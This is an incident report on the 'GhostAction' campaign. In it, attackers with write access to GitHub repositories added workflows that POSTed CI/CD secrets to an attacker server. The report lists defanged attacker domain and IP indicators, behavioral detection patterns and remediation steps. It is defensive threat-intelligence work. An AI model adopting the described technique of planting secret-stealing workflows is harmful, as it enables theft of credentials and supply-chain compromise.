Full Report
On September 5, 2025, GitGuardian reported a campaign titled "GhostAction": attackers with write access to GitHub repositories - gained by an unknown initial access vector - added a malicious GitHub Actions workflow that exfiltrates CI/CD secrets via HTTP POST to an attacker-c...
Analysis Summary
# Incident Report: GhostAction Campaign - CI/CD Secret Exfiltration via Malicious GitHub Actions
## Executive Summary
This incident details the "GhostAction" campaign, first reported on September 5, 2025, where threat actors utilized compromised write access to GitHub repositories to plant malicious GitHub Actions workflows. These workflows were engineered to exfiltrate sensitive CI/CD secrets (including npm, PyPI, Docker Hub, and cloud keys) via HTTP POST to an attacker-controlled endpoint. The activity resulted in the compromise of 3,325 secrets across 817 repositories impacting 327 users.
## Incident Details
- **Discovery Date:** September 5, 2025 (Reported by GitGuardian)
- **Incident Date:** Commencing prior to September 5, 2025
- **Affected Organization:** Multiple users/organizations hosting repositories on GitHub (327 users affected)
- **Sector:** Broad, impacting software development/Cloud-native environments
- **Geography:** Not specified (Global impact possible)
## Timeline of Events
### Initial Access
- **Date/Time:** Unknown, but prior to September 5, 2025
- **Vector:** Unknown Initial Access Vector leading to **Write Access to GitHub Repositories**. (Context suggests a possible link to Cloud native misconfiguration, though not explicitly confirmed as the entry point for this specific write access.)
- **Details:** Attackers obtained the necessary permissions to modify repository contents, specifically to add new workflow files.
### Lateral Movement
- **Details:** The primary mechanism for impact was the modification of repository configuration (adding a workflow). If valid cloud credentials were stolen, lateral movement into cloud environments via those tokens would be the subsequent step.
### Data Exfiltration/Impact
- **Date/Time:** During workflow execution (triggered on `push` and `workflow_dispatch`).
- **Details:** Malicious GitHub Actions workflows exfiltrated secrets using HTTP POST requests to `bold-dhawan.45-139-104-115.plesk[.]page` (resolving to IP `45.139.104[.]115`).
### Detection & Response
- **Detection:** Reported publicly by GitGuardian on September 5, 2025.
- **Response Actions:** Response actions were implied (e.g., removal of workflow, rotation of exposed secrets). (Specific internal organizational responses are not detailed in the context.)
## Attack Methodology
- **Initial Access:** Unknown (Focus appears to be the compromise allowing *write* access to relevant repositories).
- **Persistence:** Maintained via the presence of the malicious workflow file within the `.github/workflows/` directory.
- **Privilege Escalation:** Not explicitly detailed, but read access to organization/environment secrets is inherent to the context of a running workflow.
- **Defense Evasion:** Using standard GitHub Actions functionality to execute the payload, potentially named innocuously (e.g., "Github Actions Security").
- **Credential Access:** Inferred harvesting from repository secrets accessed by the workflow.
- **Discovery:** The malicious workflow could read repository, organization, or environment secrets it referenced.
- **Lateral Movement:** Potential pivoting into cloud tenants using stolen cloud credentials.
- **Collection:** Harvesting sensitive secrets (npm, PyPI, Docker Hub tokens, Cloud keys).
- **Exfiltration:** Exfiltrating collected secrets via **HTTP POST** to an attacker-controlled server.
- **Impact:** Compromise of source code repositories, poisoning of downstream consumers (via trojanized packages), and compromise of cloud environments.
## Impact Assessment
- **Financial:** Unknown (Costs associated with remediation and credential rotation).
- **Data Breach:** 3,325 secrets compromised, including package registry tokens (npm, PyPI, Docker Hub) and cloud platform access keys.
- **Operational:** Potential disruption due to compromised CI/CD pipelines; risk of poisoned dependencies affecting production systems.
- **Reputational:** High, as it exposes fundamental weaknesses in CI/CD security practices.
## Indicators of Compromise
- **Network Indicators (Defanged):** `bold-dhawan.45-139-104-115.plesk[.]page`, `45.139.104[.]115`
- **File Indicators:** Malicious GitHub Actions workflows (potentially named "Github Actions Security").
- **Behavioral Indicators:** Workflows triggering on `push` or `workflow_dispatch` executing outbound HTTP POST requests containing sensitive tokens to external IPs/domains.
## Response Actions
*(Based on description of necessary remediation steps)*
- **Containment:** Immediate removal of the malicious GitHub Actions workflow file from affected repositories.
- **Eradication:** Forced, immediate rotation of *all* secrets, tokens, and keys exfiltrated or potentially accessible by the compromised scope (registry tokens, cloud provider keys, environment variables).
- **Recovery:** Auditing artifacts pushed using compromised tokens; shifting CI access models towards short-lived OIDC authentication instead of long-lived static credentials.
## Lessons Learned
- The campaign highlights the critical risk associated with granting write access to repositories that utilize GitHub Actions, as a compromised account can directly inject malicious execution logic.
- Static, long-lived credentials stored as repository/environment secrets pose a massive blast radius risk, enabling immediate pivoting into target cloud environments or package registries.
- Outbound network restrictions on self-hosted runners (and potentially hosted runners, if possible) are vital to preventing data egress.
## Recommendations
1. **Restrict Static Credentials:** Migrate all CI/CD systems away from long-lived static token secrets toward secure identity federation using OpenID Connect (OIDC) for cloud access.
2. **Enforce Least Privilege for Write Access:** Strictly limit who has write access to code repositories, especially those containing CI/CD configurations. Treat write access as the highest level of compromise risk.
3. **Implement Workflow Isolation:** Utilize deployment strategies that minimize the secrets available to any single workflow execution scope.
4. **Network Segmentation:** Ensure self-hosted runners operate within tightly controlled network segments with strict egress filtering, blocking unauthorized outbound HTTP connections.